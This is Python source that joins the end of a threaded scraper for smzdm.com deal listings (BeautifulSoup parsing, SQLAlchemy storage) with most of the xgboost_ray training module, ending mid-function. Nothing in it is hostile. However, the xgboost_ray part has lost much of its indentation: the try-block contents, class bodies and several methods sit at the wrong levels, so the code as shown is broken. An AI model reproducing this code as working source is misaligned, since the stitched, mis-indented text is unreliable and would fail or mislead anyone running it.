    itemspider.start()
    """

    # Class-level queue shared by all spider threads; consumed by the
    # analyzer thread (see start_analyze()).
    divs = queue.Queue()

    def __init__(self, target_address, keyword=None):
        threading.Thread.__init__(self)
        self.target_address = target_address
        self.keyword = keyword

    def run(self):
        """Fetch the page and push the parsed item rows onto the shared queue."""
        r = requests.get(self.target_address, params=self.keyword, headers={"User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36"})
        soup = BeautifulSoup(r.content, "html.parser")
        div_row = soup.select('.feed-row-wide')
        if div_row:
            self.divs.put(div_row)

    @staticmethod
    def analyze(div_row, session):
        """Parse item rows and persist them via the given SQLAlchemy session.

        Items already stored (matched by item_id) only get their vote counts
        refreshed; new items are inserted. Commits once at the end.
        """
        for line in div_row:
            content = line.select_one('.z-feed-content')
            # Item name
            temp_name = content.select_one('div h5').a.string.strip()
            # Item URL
            temp_url = content.select_one('div h5').a['href']
            # Item id (numeric path segment of the URL)
            item_id = re.match(r".*/(\d+)/", temp_url).group(1)
            old_item = session.query(Item).filter(Item.item_id == item_id).scalar()
            # Thumbnail URL
            temp_img = line.select_one('.z-feed-img').select_one('img')['src']
            # "Worth it" / "not worth it" vote counts
            zhi = int(content.select_one('.icon-zhi-o-thin').next_sibling.string)
            buzhi = int(content.select_one('.icon-buzhi-o-thin').next_sibling.string)
            # Refresh the votes of items we have already stored.
            if old_item:
                old_item.zhi = zhi
                old_item.buzhi = buzhi
                continue
            # Item update time (the page carries a unix timestamp)
            temp_time = datetime.datetime.fromtimestamp(int(line['timesort']))
            # Item price; the tag may be missing for some rows.
            temp_price = content.select_one('.z-highlight')
            try:
                temp_price = temp_price.get_text().strip()
            except AttributeError:
                # Fix: was a bare `except:`. select_one() returned None
                # (row without a price tag), which raises AttributeError on
                # .get_text(); keep temp_price as None and log the item.
                logger.warning('item:{}price:{}'.format(temp_url, temp_price))
            item = Item(name=temp_name, item_id=item_id, url=temp_url, img=temp_img,
                        update_time=temp_time, price=temp_price, zhi=zhi, buzhi=buzhi)
            session.add(item)
        session.commit()
class Item(Base):
    """ORM model for one scraped smzdm deal item."""

    __tablename__ = 'items'

    id = Column(Integer, primary_key=True)
    name = Column(String)
    # smzdm's own numeric item id (parsed from the item URL).
    item_id = Column(Integer)
    # "Worth it" / "not worth it" vote counts.
    zhi = Column(Integer)
    buzhi = Column(Integer)
    price = Column(String)
    url = Column(String)
    img = Column(String)
    update_time = Column(DateTime)

    def __init__(self, name, item_id, url, img, update_time, price, zhi, buzhi):
        """Explicit constructor to make instance attributes easy to customize."""
        self.name = name
        self.item_id = item_id
        self.url = url
        self.img = img
        self.update_time = update_time
        self.zhi = zhi
        self.buzhi = buzhi
        self.price =price

    def __repr__(self):
        # Returns name and URL only; the long form below is kept for debugging.
        return("商品名字:{}\n详细地址:{}".format(self.name, self.url))
        # return("商品名字:{}\n详细地址:{}\n价格:{}\n值↑:{} 不值↓:{}\n更新日期:{}\n缩略图:{}".format(self.name,
        #                                                           self.url,
        #                                                           self.price,
        #                                                           self.zhi,
        #                                                           self.buzhi,
        #                                                           self.update_time,
        #                                                           self.img))
def start_analyze():
    """Consume parsed rows from ItemSpider.divs and store them in the DB.

    Runs until the queue stays empty for 3 seconds, which signals that all
    spider threads have finished. Analysis errors are logged and skipped.
    """
    session = Session()
    try:
        while True:
            try:
                div_row = ItemSpider.divs.get(timeout=3)
                ItemSpider.analyze(div_row, session)
            except queue.Empty:
                logger.info('all pages finished')
                break
            except Exception as e:
                logger.warning('analyze_warning:{}'.format(e))
                continue
    finally:
        # Fix: always release the DB session -- previously an unexpected
        # exception (e.g. KeyboardInterrupt) would leak it.
        session.close()
if __name__=="__main__":
    # Create the database tables if they do not exist yet.
    Base.metadata.create_all(engine)
    # Preset scrapeable page URL prefixes (the page number gets appended).
    urls = {'all':"https://www.smzdm.com/jingxuan/p",
            'inland':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d1r0p",
            'haitao':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d2r0p",
            'quanma':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d0r2p",
            'huodong':"https://www.smzdm.com/jingxuan/xuan/s0f0t0b0d0r3p",
            'computer':"https://www.smzdm.com/jingxuan/xuan/s0f163t0b0d0r0p"}
    while True:
        # Per-round bookkeeping.
        start_time = time.time()
        # Crawling: request-thread limiter.
        # NOTE(review): acquiring the semaphore once from the main thread does
        # not actually limit the spider threads; each ItemSpider would have to
        # acquire it itself -- confirm intended behavior.
        sem = threading.Semaphore(30)
        # Crawling: the processing (database) thread.
        thread = threading.Thread(target=start_analyze)
        thread.start()
        with sem:
            # Scrape pages 1..9 of the "all" listing, staggered by 0.1s.
            for i in range(1, 10):
                target_address = urls['all'] + str(i)
                thread = ItemSpider(target_address)
                thread.start()
                time.sleep(0.1)
        # Wait for all worker threads (skip the main thread) and log timing.
        for spider_thread in threading.enumerate()[1:]:
            spider_thread.join()
        logger.info('use_time:{}'.format(time.time()-start_time))
        print('用时:', time.time()-start_time)
        # Sleep 5 minutes between scraping rounds.
        time.sleep(300)
|
main.py | from typing import Tuple, Dict, Any, List, Optional, Callable, Union, Sequence
from dataclasses import dataclass, field
from distutils.version import LooseVersion
import functools
import multiprocessing
import os
import pickle
import time
import threading
import warnings
import re
import inspect
import numpy as np
import pandas as pd
from xgboost_ray.xgb import xgboost as xgb
from xgboost.core import XGBoostError
try:
from xgboost.core import EarlyStopException
except ImportError:
class EarlyStopException(XGBoostError):
pass
from xgboost_ray.callback import DistributedCallback, \
DistributedCallbackContainer
from xgboost_ray.compat import TrainingCallback, RabitTracker, LEGACY_CALLBACK
try:
import ray
from ray import logger
from ray.exceptions import RayActorError, RayTaskError
from ray.actor import ActorHandle
from ray.util import get_node_ip_address, placement_group
from ray.util.annotations import PublicAPI, DeveloperAPI
from ray.util.placement_group import PlacementGroup, \
remove_placement_group, get_current_placement_group
from xgboost_ray.util import Event, Queue, MultiActorTask, \
force_on_current_node
if LooseVersion(ray.__version__) >= LooseVersion("1.5.0"):
# https://github.com/ray-project/ray/pull/16437
DEFAULT_PG = "default"
else:
DEFAULT_PG = None
RAY_INSTALLED = True
except ImportError:
ray = get_node_ip_address = Queue = Event = ActorHandle = logger = None
def PublicAPI(f):
@functools.wraps(f)
def inner_f(*args, **kwargs):
return f(*args, **kwargs)
return inner_f
DeveloperAPI = PublicAPI
RAY_INSTALLED = False
from xgboost_ray.tune import _try_add_tune_callback, _get_tune_resources, \
TUNE_USING_PG, is_session_enabled
from xgboost_ray.matrix import RayDMatrix, combine_data, \
RayDeviceQuantileDMatrix, RayDataIter, concat_dataframes, \
LEGACY_MATRIX
from xgboost_ray.session import init_session, put_queue, \
set_session_queue
def _get_environ(item: str, old_val: Any):
env_var = f"RXGB_{item}"
new_val = old_val
if env_var in os.environ:
new_val_str = os.environ.get(env_var)
if isinstance(old_val, bool):
new_val = bool(int(new_val_str))
elif isinstance(old_val, int):
new_val = int(new_val_str)
elif isinstance(old_val, float):
new_val = float(new_val_str)
else:
new_val = new_val_str
return new_val
@dataclass
class _XGBoostEnv:
    """Module configuration with per-attribute environment overrides.

    Every attribute lookup re-checks the corresponding ``RXGB_<NAME>``
    environment variable (see _get_environ), so values can be changed at
    runtime without re-importing the module.
    """

    # Whether to use SPREAD placement group strategy for training.
    USE_SPREAD_STRATEGY: bool = True
    # How long to wait for placement group creation before failing.
    PLACEMENT_GROUP_TIMEOUT_S: int = 100
    # Status report frequency when waiting for initial actors
    # and during training
    STATUS_FREQUENCY_S: int = 30
    # If restarting failed actors is disabled
    ELASTIC_RESTART_DISABLED: bool = False
    # How often to check for new available resources
    ELASTIC_RESTART_RESOURCE_CHECK_S: int = 30
    # How long to wait before triggering a new start of the training loop
    # when new actors become available
    ELASTIC_RESTART_GRACE_PERIOD_S: int = 10

    def __getattribute__(self, item):
        # Intercept every attribute access so environment overrides win.
        old_val = super(_XGBoostEnv, self).__getattribute__(item)
        new_val = _get_environ(item, old_val)
        if new_val != old_val:
            # Persist the override so subsequent reads see it directly.
            setattr(self, item, new_val)
        return super(_XGBoostEnv, self).__getattribute__(item)
# Singleton used throughout the module to read configuration values, each of
# which can be overridden via an RXGB_* environment variable.
ENV = _XGBoostEnv()

# "0.0.0" when xgboost could not be imported at all.
xgboost_version = xgb.__version__ if xgb else "0.0.0"

LEGACY_WARNING = (
    f"You are using `xgboost_ray` with a legacy XGBoost version "
    f"(version {xgboost_version}). While we try to support "
    f"older XGBoost versions, please note that this library is only "
    f"fully tested and supported for XGBoost >= 1.4. Please consider "
    f"upgrading your XGBoost version (`pip install -U xgboost`).")

# XGBoost version as an int tuple for comparisons (non-numeric characters
# such as "rc"/"dev" suffixes are stripped before splitting).
XGBOOST_VERSION_TUPLE = tuple(
    int(x) for x in re.sub(r"[^\.0-9]", "", xgboost_version).split("."))
class RayXGBoostTrainingError(RuntimeError):
    """Raised from RayXGBoostActor.train() when the local xgb.train function
    did not complete."""
    # Distinct from RayXGBoostTrainingStopped, which signals a deliberate stop.
    pass
class RayXGBoostTrainingStopped(RuntimeError):
    """Raised from RayXGBoostActor.train() when training was deliberately
    stopped."""
    # Deliberate stop (e.g. via the shared stop event), not a failure.
    pass
class RayXGBoostActorAvailable(RuntimeError):
    """Raised from `_update_scheduled_actor_states()` when new actors become
    available in elastic training."""
    pass
def _assert_ray_support():
    """Raise ImportError if the ray package could not be imported."""
    if not RAY_INSTALLED:
        raise ImportError(
            "Ray needs to be installed in order to use this module. "
            "Try: `pip install ray`")
def _maybe_print_legacy_warning():
    """Warn if either the matrix or callback API fell back to legacy xgboost."""
    if LEGACY_MATRIX or LEGACY_CALLBACK:
        warnings.warn(LEGACY_WARNING)
def _is_client_connected() -> bool:
    """Return True if this process is connected through the Ray client."""
    try:
        return ray.util.client.ray.is_connected()
    except Exception:
        # Broad catch: treat any failure (presumably a Ray version without
        # the client API) as "not connected".
        return False
class _RabitTrackerCompatMixin:
    """Fallback calls to legacy terminology"""

    def accept_workers(self, n_workers: int):
        # Delegate to the legacy-named method provided by the base tracker.
        return self.accept_slaves(n_workers)

    def worker_envs(self):
        return self.slave_envs()
class _RabitTracker(RabitTracker, _RabitTrackerCompatMixin):
    """
    This class overwrites the xgboost-provided RabitTracker to switch
    from a daemon thread to a multiprocessing Process. This is so that
    we are able to terminate/kill the tracking process at will.
    """

    def start(self, nworker):
        # TODO: refactor RabitTracker to support spawn process creation.
        # In python 3.8, spawn is used as default process creation on macOS.
        # But spawn doesn't work because `run` is not pickleable.
        # For now we force the start method to use fork.
        multiprocessing.set_start_method("fork", force=True)

        def run():
            self.accept_workers(nworker)

        # Still named `thread` for compatibility with the base class API,
        # but it is actually a separate process.
        self.thread = multiprocessing.Process(target=run, args=())
        self.thread.start()
def _start_rabit_tracker(num_workers: int):
    """Start Rabit tracker. The workers connect to this tracker to share
    their results.

    The Rabit tracker is the main process that all local workers connect to
    to share their weights. When one or more actors die, we want to
    restart the Rabit tracker, too, for two reasons: First we don't want to
    be potentially stuck with stale connections from old training processes.
    Second, we might restart training with a different number of actors, and
    for that we would have to restart the tracker anyway.

    To do this we start the Tracker in its own subprocess with its own PID.
    We can use this process then to specifically kill/terminate the tracker
    process in `_stop_rabit_tracker` without touching other functionality.

    Returns a tuple of (tracker process handle, env-var dict the workers
    need to connect).
    """
    host = get_node_ip_address()

    env = {"DMLC_NUM_WORKER": num_workers}
    rabit_tracker = _RabitTracker(host, num_workers)

    # Get tracker Host + IP
    env.update(rabit_tracker.worker_envs())
    rabit_tracker.start(num_workers)

    logger.debug(
        f"Started Rabit tracker process with PID {rabit_tracker.thread.pid}")

    return rabit_tracker.thread, env
def _stop_rabit_tracker(rabit_process: multiprocessing.Process):
    """Stop the Rabit tracker process: wait briefly, then force-terminate."""
    logger.debug(f"Stopping Rabit process with PID {rabit_process.pid}")
    # Give the process up to 5 seconds to exit on its own, then terminate.
    rabit_process.join(timeout=5)
    rabit_process.terminate()
class _RabitContext:
    """This context is used by local training actors to connect to the
    Rabit tracker.

    Args:
        actor_id (str): Unique actor ID
        args (list): Arguments for Rabit initialisation. These are
            environment variables to configure Rabit clients.
    """

    def __init__(self, actor_id, args):
        # NOTE: the caller's list is mutated -- the task id entry is
        # appended in place.
        self.args = args
        self.args.append(("DMLC_TASK_ID=[xgboost.ray]:" + actor_id).encode())

    def __enter__(self):
        xgb.rabit.init(self.args)

    def __exit__(self, *args):
        xgb.rabit.finalize()
def _ray_get_actor_cpus():
    """Return the number of CPUs assigned to this actor, or None if unknown."""
    # Get through resource IDs
    resource_ids = ray.worker.get_resource_ids()
    if "CPU" in resource_ids:
        # Entries are (resource id, fraction) pairs; sum the fractions.
        return sum(cpu[1] for cpu in resource_ids["CPU"])
    return None
def _ray_get_cluster_cpus():
    """Return the total CPU count of the Ray cluster, or None if unknown."""
    return ray.cluster_resources().get("CPU", None)
def _get_min_node_cpus():
    """Return the smallest CPU count among alive Ray nodes (at least 1.0)."""
    alive_node_cpus = (
        node.get("Resources", {}).get("CPU", 0.0) for node in ray.nodes()
        if node.get("Alive", False))
    min_node_cpus = min(alive_node_cpus)
    # Guard against nodes reporting zero CPUs.
    return min_node_cpus if min_node_cpus > 0.0 else 1.0
def _set_omp_num_threads():
    """Sync OMP_NUM_THREADS with the CPUs assigned to this Ray actor.

    Returns the resulting thread count as an int (0 if the variable ends
    up unset).
    """
    ray_cpus = _ray_get_actor_cpus()
    if ray_cpus:
        os.environ["OMP_NUM_THREADS"] = str(int(ray_cpus))
    else:
        # No CPU assignment found: clear the variable so downstream
        # libraries fall back to their own default threading behavior.
        if "OMP_NUM_THREADS" in os.environ:
            del os.environ["OMP_NUM_THREADS"]
    return int(float(os.environ.get("OMP_NUM_THREADS", "0.0")))
def _get_dmatrix(data: RayDMatrix, param: Dict) -> xgb.DMatrix:
    """Build a local ``xgb.DMatrix`` (or DeviceQuantileDMatrix) from shard data.

    # Arguments
    data (RayDMatrix): The distributed matrix descriptor; provides metadata
      (feature names/types, missing value) and receives matrix properties
      back via ``update_matrix_properties``.
    param (Dict): The local shard parameters (data/label/weight/...). This
      dict is mutated in place.
    """
    if not LEGACY_MATRIX and isinstance(data, RayDeviceQuantileDMatrix):
        # If we only got a single data shard, create a list so we can
        # iterate over it
        if not isinstance(param["data"], list):
            param["data"] = [param["data"]]
        if not isinstance(param["label"], list):
            param["label"] = [param["label"]]
        if not isinstance(param["weight"], list):
            param["weight"] = [param["weight"]]
        if not isinstance(param["qid"], list):
            param["qid"] = [param["qid"]]
        # Fix: this previously tested param["data"] (already wrapped into a
        # list above, so the branch never ran) instead of base_margin --
        # single-shard base margins were never wrapped.
        if not isinstance(param["base_margin"], list):
            param["base_margin"] = [param["base_margin"]]

        param["label_lower_bound"] = [None]
        param["label_upper_bound"] = [None]

        dm_param = {
            "feature_names": data.feature_names,
            "feature_types": data.feature_types,
            "missing": data.missing,
        }
        param.update(dm_param)

        it = RayDataIter(**param)
        matrix = xgb.DeviceQuantileDMatrix(it, **dm_param)
    else:
        if isinstance(param["data"], list):
            # Multiple shards: concatenate them into single frames.
            dm_param = {
                "data": concat_dataframes(param["data"]),
                "label": concat_dataframes(param["label"]),
                "weight": concat_dataframes(param["weight"]),
                "qid": concat_dataframes(param["qid"]),
                "base_margin": concat_dataframes(param["base_margin"]),
                "label_lower_bound": concat_dataframes(
                    param["label_lower_bound"]),
                "label_upper_bound": concat_dataframes(
                    param["label_upper_bound"]),
            }
            param.update(dm_param)

        # Bounds are passed via set_info() on modern xgboost, not the ctor.
        ll = param.pop("label_lower_bound", None)
        lu = param.pop("label_upper_bound", None)

        if LEGACY_MATRIX:
            param.pop("base_margin", None)

        # Older xgboost versions do not accept a `qid` constructor argument.
        if "qid" not in inspect.signature(xgb.DMatrix).parameters:
            param.pop("qid", None)

        matrix = xgb.DMatrix(**param)

        if not LEGACY_MATRIX:
            matrix.set_info(label_lower_bound=ll, label_upper_bound=lu)

    data.update_matrix_properties(matrix)
    return matrix
@PublicAPI(stability="beta")
@dataclass
class RayParams:
    """Parameters to configure Ray-specific behavior.

    Args:
        num_actors (int): Number of parallel Ray actors.
        cpus_per_actor (int): Number of CPUs to be used per Ray actor.
        gpus_per_actor (int): Number of GPUs to be used per Ray actor.
        resources_per_actor (Optional[Dict]): Dict of additional resources
            required per Ray actor.
        elastic_training (bool): If True, training will continue with
            fewer actors if an actor fails. Default False.
        max_failed_actors (int): If `elastic_training` is True, this
            specifies the maximum number of failed actors with which
            we still continue training.
        max_actor_restarts (int): Number of retries when Ray actors fail.
            Defaults to 0 (no retries). Set to -1 for unlimited retries.
        checkpoint_frequency (int): How often to save checkpoints. Defaults
            to ``5`` (every 5th iteration).
        distributed_callbacks (Optional[List[DistributedCallback]]):
            Callbacks invoked on the remote actors (e.g. around data
            loading and training).
    """

    # Actor scheduling
    num_actors: int = 0
    cpus_per_actor: int = 0
    gpus_per_actor: int = -1
    resources_per_actor: Optional[Dict] = None

    # Fault tolerance
    elastic_training: bool = False
    max_failed_actors: int = 0
    max_actor_restarts: int = 0
    checkpoint_frequency: int = 5

    # Distributed callbacks
    distributed_callbacks: Optional[List[DistributedCallback]] = None

    def get_tune_resources(self):
        """Return the resources to use for xgboost_ray training with Tune."""
        if self.cpus_per_actor <= 0 or self.num_actors <= 0:
            raise ValueError("num_actors and cpus_per_actor both must be "
                             "greater than 0.")
        # gpus_per_actor defaults to -1 ("auto"); clamp to 0 for Tune.
        return _get_tune_resources(
            num_actors=self.num_actors,
            cpus_per_actor=self.cpus_per_actor,
            gpus_per_actor=max(0, self.gpus_per_actor),
            resources_per_actor=self.resources_per_actor)
@dataclass
class _Checkpoint:
    # Boosting iteration the checkpoint was taken at; -1 marks the final model.
    iteration: int = 0
    # Pickled booster bytes, or None when no model is attached.
    value: Optional[bytes] = None
def _validate_ray_params(ray_params: Union[None, RayParams, dict]) \
        -> RayParams:
    """Normalize user-provided ray_params into a validated RayParams instance.

    Accepts None (defaults), a dict (converted via RayParams(**dict)) or an
    existing RayParams. Raises ValueError for other types or when
    ``num_actors`` was left at 0; warns when only one actor is requested.
    """
    if ray_params is None:
        ray_params = RayParams()
    elif isinstance(ray_params, dict):
        ray_params = RayParams(**ray_params)
    elif not isinstance(ray_params, RayParams):
        raise ValueError(
            f"`ray_params` must be a `RayParams` instance, a dict, or None, "
            f"but it was {type(ray_params)}."
            f"\nFIX THIS preferably by passing a `RayParams` instance as "
            f"the `ray_params` parameter.")
    if ray_params.num_actors <= 0:
        raise ValueError(
            "The `num_actors` parameter is set to 0. Please always specify "
            "the number of distributed actors you want to use."
            "\nFIX THIS by passing a `RayParams(num_actors=X)` argument "
            "to your call to xgboost_ray.")
    elif ray_params.num_actors < 2:
        warnings.warn(
            f"`num_actors` in `ray_params` is smaller than 2 "
            f"({ray_params.num_actors}). XGBoost will NOT be distributed!")
    return ray_params
@DeveloperAPI
class RayXGBoostActor:
"""Remote Ray XGBoost actor class.
This remote actor handles local training and prediction of one data
shard. It initializes a Rabit context, thus connecting to the Rabit
all-reduce ring, and initializes local training, sending updates
to other workers.
The actor with rank 0 also checkpoints the model periodically and
sends the checkpoint back to the driver.
Args:
rank (int): Rank of the actor. Must be ``0 <= rank < num_actors``.
num_actors (int): Total number of actors.
queue (Queue): Ray queue to communicate with main process.
checkpoint_frequency (int): How often to store checkpoints. Defaults
to ``5``, saving checkpoints every 5 boosting rounds.
"""
def __init__(
        self,
        rank: int,
        num_actors: int,
        queue: Optional[Queue] = None,
        stop_event: Optional[Event] = None,
        checkpoint_frequency: int = 5,
        distributed_callbacks: Optional[List[DistributedCallback]] = None):
    # Queue used to report checkpoints/results back to the driver.
    self.queue = queue
    init_session(rank, self.queue)
    self.rank = rank
    self.num_actors = num_actors
    self.checkpoint_frequency = checkpoint_frequency

    # Loaded local shards, keyed by the RayDMatrix they came from.
    self._data: Dict[RayDMatrix, xgb.DMatrix] = {}
    # Number of local rows per loaded RayDMatrix.
    self._local_n: Dict[RayDMatrix, int] = {}

    # Event used by the driver to signal this actor to stop training.
    self._stop_event = stop_event

    self._distributed_callbacks = DistributedCallbackContainer(
        distributed_callbacks)
    self._distributed_callbacks.on_init(self)
    _set_omp_num_threads()
    logger.debug(f"Initialized remote XGBoost actor with rank {self.rank}")
def set_queue(self, queue: Queue):
    """Replace the driver communication queue and propagate it to the session."""
    self.queue = queue
    set_session_queue(self.queue)
def set_stop_event(self, stop_event: Event):
    """Replace the stop event used to interrupt training."""
    self._stop_event = stop_event
def _get_stop_event(self):
    """Return the current stop event (compared by identity in _stop_callback)."""
    return self._stop_event
def pid(self):
    """Get process PID. Used for checking if still alive"""
    return os.getpid()
def ip(self):
    """Get node IP address."""
    return get_node_ip_address()
def _save_checkpoint_callback(self):
    """Send checkpoints to driver"""
    # Capture the actor so the nested callback can read its settings.
    this = self

    class _SaveInternalCheckpointCallback(TrainingCallback):
        def after_iteration(self, model, epoch, evals_log):
            # Only rank 0 checkpoints, every `checkpoint_frequency` rounds.
            if xgb.rabit.get_rank() == 0 and \
                    epoch % this.checkpoint_frequency == 0:
                put_queue(_Checkpoint(epoch, pickle.dumps(model)))

        def after_training(self, model):
            # Iteration -1 marks the final model (see _Checkpoint).
            if xgb.rabit.get_rank() == 0:
                put_queue(_Checkpoint(-1, pickle.dumps(model)))
            return model

    return _SaveInternalCheckpointCallback()
def _stop_callback(self):
    """Stop if event is set"""
    this = self
    # Keep track of initial stop event. Since we're training in a thread,
    # the stop event might be overwritten, which should be handled
    # as if the previous stop event was set.
    initial_stop_event = self._stop_event

    class _StopCallback(TrainingCallback):
        def after_iteration(self, model, epoch, evals_log):
            try:
                if this._stop_event.is_set() or \
                        this._get_stop_event() is not initial_stop_event:
                    if LEGACY_CALLBACK:
                        raise EarlyStopException(epoch)
                    # Returning True stops training
                    return True
            except RayActorError:
                # Lost connection to the driver-side event: stop as well.
                if LEGACY_CALLBACK:
                    raise EarlyStopException(epoch)
                return True

    return _StopCallback()
def load_data(self, data: RayDMatrix):
    """Load this actor's shard of *data*; no-op if it was already loaded."""
    if data in self._data:
        return
    self._distributed_callbacks.before_data_loading(self, data)
    param = data.get_data(self.rank, self.num_actors)
    # Record the local row count (shards may arrive as a list of parts).
    if isinstance(param["data"], list):
        self._local_n[data] = sum(len(a) for a in param["data"])
    else:
        self._local_n[data] = len(param["data"])
    self._data[data] = param
    self._distributed_callbacks.after_data_loading(self, data)
    def train(self, rabit_args: List[str], return_bst: bool,
              params: Dict[str, Any], dtrain: RayDMatrix,
              evals: Tuple[RayDMatrix, str], *args,
              **kwargs) -> Dict[str, Any]:
        """Run local xgboost training on this actor's data shards.

        Training runs in a background thread so that the loop below can
        react to the distributed stop event while xgboost is working.

        Args:
            rabit_args: Arguments used to set up the Rabit communication
                context.
            return_bst: If True, keep the trained booster in the result
                dict (only one actor needs to return it).
            params: xgboost training parameters.
            dtrain: Training data.
            evals: ``(data, name)`` pairs to evaluate on.
            *args, **kwargs: Passed through to ``xgb.train()``.

        Returns:
            Dict with ``evals_result``, the local row count ``train_n``,
            and — if ``return_bst`` — the booster under ``bst``.

        Raises:
            RayXGBoostTrainingStopped: If the stop event was set.
            RayXGBoostTrainingError: If local training failed.
        """
        self._distributed_callbacks.before_train(self)

        num_threads = _set_omp_num_threads()

        local_params = params.copy()

        if "xgb_model" in kwargs:
            if isinstance(kwargs["xgb_model"], bytes):
                # bytearray type gets lost in remote actor call
                kwargs["xgb_model"] = bytearray(kwargs["xgb_model"])

        if "nthread" not in local_params and "n_jobs" not in local_params:
            if num_threads > 0:
                local_params["nthread"] = num_threads
                local_params["n_jobs"] = num_threads
            else:
                # Fall back to the CPUs Ray assigned to this actor.
                local_params["nthread"] = sum(
                    num
                    for _, num in ray.worker.get_resource_ids().get("CPU", []))
                local_params["n_jobs"] = local_params["nthread"]

        if dtrain not in self._data:
            self.load_data(dtrain)
        for deval, _name in evals:
            if deval not in self._data:
                self.load_data(deval)

        evals_result = dict()

        # Inject the checkpoint and stop callbacks alongside user callbacks.
        if "callbacks" in kwargs:
            callbacks = kwargs["callbacks"] or []
        else:
            callbacks = []
        callbacks.append(self._save_checkpoint_callback())
        callbacks.append(self._stop_callback())
        kwargs["callbacks"] = callbacks

        result_dict = {}
        error_dict = {}

        # We run xgb.train in a thread to be able to react to the stop event.
        def _train():
            try:
                with _RabitContext(str(id(self)), rabit_args):
                    local_dtrain = _get_dmatrix(dtrain, self._data[dtrain])

                    if not local_dtrain.get_label().size:
                        raise RuntimeError(
                            "Training data has no label set. Please make sure "
                            "to set the `label` argument when initializing "
                            "`RayDMatrix()` for data you would like "
                            "to train on.")

                    local_evals = []
                    for deval, name in evals:
                        local_evals.append((_get_dmatrix(
                            deval, self._data[deval]), name))

                    # Legacy xgboost versions don't invoke callback
                    # lifecycle hooks themselves — do it manually.
                    if LEGACY_CALLBACK:
                        for xgb_callback in kwargs.get("callbacks", []):
                            if isinstance(xgb_callback, TrainingCallback):
                                xgb_callback.before_training(None)

                    bst = xgb.train(
                        local_params,
                        local_dtrain,
                        *args,
                        evals=local_evals,
                        evals_result=evals_result,
                        **kwargs)

                    if LEGACY_CALLBACK:
                        for xgb_callback in kwargs.get("callbacks", []):
                            if isinstance(xgb_callback, TrainingCallback):
                                xgb_callback.after_training(bst)

                    result_dict.update({
                        "bst": bst,
                        "evals_result": evals_result,
                        "train_n": self._local_n[dtrain]
                    })
            except EarlyStopException:
                # Usually this should be caught by XGBoost core.
                # Silent fail, will be raised as RayXGBoostTrainingStopped.
                return
            except XGBoostError as e:
                error_dict.update({"exception": e})
                return

        thread = threading.Thread(target=_train)
        thread.daemon = True
        thread.start()
        # Poll the training thread and the stop event concurrently.
        while thread.is_alive():
            thread.join(timeout=0)
            if self._stop_event.is_set():
                raise RayXGBoostTrainingStopped("Training was interrupted.")
            time.sleep(0.1)

        if not result_dict:
            # Thread finished without producing a result: training failed.
            raise_from = error_dict.get("exception", None)
            raise RayXGBoostTrainingError("Training failed.") from raise_from

        thread.join()
        self._distributed_callbacks.after_train(self, result_dict)

        if not return_bst:
            result_dict.pop("bst", None)

        return result_dict
def predict(self, model: xgb.Booster, data: RayDMatrix, **kwargs):
self._distributed_callbacks.before_predict(self)
_set_omp_num_threads()
if data not in self._data:
self.load_data(data)
local_data = _get_dmatrix(data, self._data[data])
predictions = model.predict(local_data, **kwargs)
if predictions.ndim == 1:
callback_predictions = pd.Series(predictions)
else:
callback_predictions = pd.DataFrame(predictions)
self._distributed_callbacks.after_predict(self, callback_predictions)
return predictions
@ray.remote
class _RemoteRayXGBoostActor(RayXGBoostActor):
    """Remote (Ray actor) flavor of :class:`RayXGBoostActor`."""
    pass
class _PrepareActorTask(MultiActorTask):
    """Tracks the futures that make a single actor ready for training:
    queue/stop-event registration plus data loading."""

    def __init__(self, actor: ActorHandle, queue: Queue, stop_event: Event,
                 load_data: List[RayDMatrix]):
        futures = [
            actor.set_queue.remote(queue),
            actor.set_stop_event.remote(stop_event),
        ]
        futures.extend(
            actor.load_data.remote(matrix) for matrix in load_data)
        super().__init__(futures)
def _autodetect_resources(ray_params: RayParams,
                          use_tree_method: bool = False) -> Tuple[int, int]:
    """Resolve per-actor CPU/GPU counts left at their default values.

    Returns:
        Tuple of ``(cpus_per_actor, gpus_per_actor)``.
    """
    gpus_per_actor = ray_params.gpus_per_actor
    cpus_per_actor = ray_params.cpus_per_actor

    # -1 means "autodetect": grant one GPU per actor iff a GPU tree
    # method is in use, otherwise none.
    if gpus_per_actor == -1:
        gpus_per_actor = 1 if use_tree_method else 0

    # <=0 means "autodetect": split cluster CPUs evenly across actors,
    # bounded above by the smallest node's CPU count and below by 1.
    if cpus_per_actor <= 0:
        cluster_cpus = _ray_get_cluster_cpus() or 1
        even_share = int(cluster_cpus // ray_params.num_actors)
        min_node = int(_get_min_node_cpus() or 1)
        cpus_per_actor = max(1, min(min_node, even_share))

    return cpus_per_actor, gpus_per_actor
def _create_actor(
        rank: int,
        num_actors: int,
        num_cpus_per_actor: int,
        num_gpus_per_actor: int,
        resources_per_actor: Optional[Dict] = None,
        placement_group: Optional[PlacementGroup] = None,
        queue: Optional[Queue] = None,
        checkpoint_frequency: int = 5,
        distributed_callbacks: Optional[Sequence[DistributedCallback]] = None
) -> ActorHandle:
    """Schedule one remote training actor with the given resources."""
    # Send DEFAULT_PG here, which changed in Ray >= 1.5.0
    # If we send `None`, this will ignore the parent placement group and
    # lead to errors e.g. when used within Ray Tune
    actor_cls = _RemoteRayXGBoostActor.options(
        num_cpus=num_cpus_per_actor,
        num_gpus=num_gpus_per_actor,
        resources=resources_per_actor,
        placement_group_capture_child_tasks=True,
        placement_group=placement_group or DEFAULT_PG)
    return actor_cls.remote(
        rank=rank,
        num_actors=num_actors,
        queue=queue,
        checkpoint_frequency=checkpoint_frequency,
        distributed_callbacks=distributed_callbacks)
def _trigger_data_load(actor, dtrain, evals):
wait_load = [actor.load_data.remote(dtrain)]
for deval, _name in evals:
wait_load.append(actor.load_data.remote(deval))
return wait_load
def _handle_queue(queue: Queue, checkpoint: _Checkpoint,
                  callback_returns: Dict):
    """Handle results obtained from workers through the remote Queue object.

    Remote actors supply these results via the
    ``xgboost_ray.session.put_queue()`` function. These can be:

    - Callables. These will be called immediately with no arguments.
    - ``_Checkpoint`` objects. These will update the latest checkpoint
      object on the driver.
    - Any other type. These will be appended to an actor rank-specific
      ``callback_returns`` dict that will be written to the
      ``additional_returns`` dict of the :func:`train() <train>` method.
    """
    while not queue.empty():
        # Items are (actor_rank, payload) pairs.
        (actor_rank, item) = queue.get()
        if isinstance(item, Callable):
            item()
        elif isinstance(item, _Checkpoint):
